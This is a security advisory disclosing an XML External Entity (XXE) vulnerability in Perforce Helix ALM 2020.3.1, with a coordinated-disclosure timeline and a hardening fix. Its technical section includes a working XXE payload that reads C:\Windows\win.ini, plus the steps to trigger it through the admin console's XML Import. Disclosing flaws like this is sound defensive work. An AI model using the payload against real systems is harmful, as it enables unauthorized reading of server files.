#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product:  Helix ALM [1]
# Vendor:   Perforce
# CSNC ID:  CSNC-2021-005
# CVE ID:   CVE-2021-28973
# Subject:  XML External Entity Resolution (XXE)
# Risk:     High
# Effect:   Remotely exploitable
# Author:   Emanuele Barbeno <emanuele.barbeno@compass-security.com>
# Date:     07.04.2021
#
#############################################################


Introduction
------------

Helix ALM, formerly called TestTrack, is application lifecycle
management (ALM) software developed by Perforce. The software allows 
developers to manage requirements, defects, issues and testing during 
software development.

The XML Import functionality of the Administration console accepts 
XML input data which is parsed by insecurely configured software 
components, which can be abused for XML External Entity Attacks. [2]


Affected
--------

Vulnerable:
 * 2020.3.1

Not vulnerable:
 * 2021.1.0

No other version was tested, but it is believed for the older versions 
to be vulnerable as well.


Technical Description
---------------------

The following XML file can be used to retrieve to retrieve the content 
of the win.ini file
```
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE TestTrackData [
	<!ELEMENT TestTrackData (folder)>
	<!ATTLIST TestTrackData  xmlns CDATA #FIXED ''  version CDATA #REQUIRED>
	<!ELEMENT folder (folder-name,is-locked,permissions,task-board, folder-access,folder-path,folder-type)>
	<!ATTLIST folder  xmlns CDATA #FIXED ''>
	<!ELEMENT is-locked (#PCDATA)>
	<!ATTLIST is-locked  xmlns CDATA #FIXED ''>
	<!ELEMENT permissions (default)>
	<!ATTLIST permissions  xmlns CDATA #FIXED ''>
	<!ELEMENT task-board (#PCDATA)>
	<!ATTLIST task-board  xmlns CDATA #FIXED ''>
	<!ELEMENT folder-access (#PCDATA)>
	<!ATTLIST folder-access  xmlns CDATA #FIXED ''>
	<!ELEMENT folder-path (#PCDATA)>
	<!ATTLIST folder-path  xmlns CDATA #FIXED ''>
	<!ELEMENT folder-type (#PCDATA)>
	<!ATTLIST folder-type  xmlns CDATA #FIXED ''>
	<!ELEMENT default (#PCDATA)>
	<!ATTLIST default  xmlns CDATA #FIXED ''  permission-type CDATA #REQUIRED>
	<!ELEMENT folder-name ANY>
	<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini"> 
]>
<TestTrackData version="2097921">
<folder>
	<folder-name>&xxe;</folder-name>
	<is-locked>false</is-locked>
	<permissions>
		<default permission-type="1">All folder permissions</default>
	</permissions>
	<task-board>Program Review</task-board>
	<folder-access>Public</folder-access>
	<folder-path>/Public/Product APS</folder-path>
	<folder-type>Product</folder-type>
</folder>
</TestTrackData>
```

Then login to the administration console, click on the 'XML Import' 
item in the left menu and click on the 'Browse' button. Select the 
XML file containing the XML content showed before and click on the 
'Validate' button. The content of the C:\Windows\win.ini file on 
the server is shown in the error message.


Workaround / Fix
----------------

The vulnerability is a result of a weakly configured/parameterized 
XML parser. [3] 
The parser needs to be hardened by updating Helix ALM to the newer 
version or by changing settings in the configuration in the code. 
It must not allow the use of inline DTDs and external entities.


Timeline
--------
2021-03-07:     Discovery by Emanuele Barbeno
2021-03-07:     Initial vendor notification
2021-03-08:     Initial vendor response
2021-03-22:     Assigned CVE-2021-28973
2021-04-01:     Release of fixed Version / Patch
2021-04-07:     Coordinated public disclosure date


References
----------
[1] https://www.perforce.com/products/helix-alm
[2] https://owasp.org/www-project-top-ten/2017/A4_2017-XML_External_Entities_(XXE).html
[3] https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html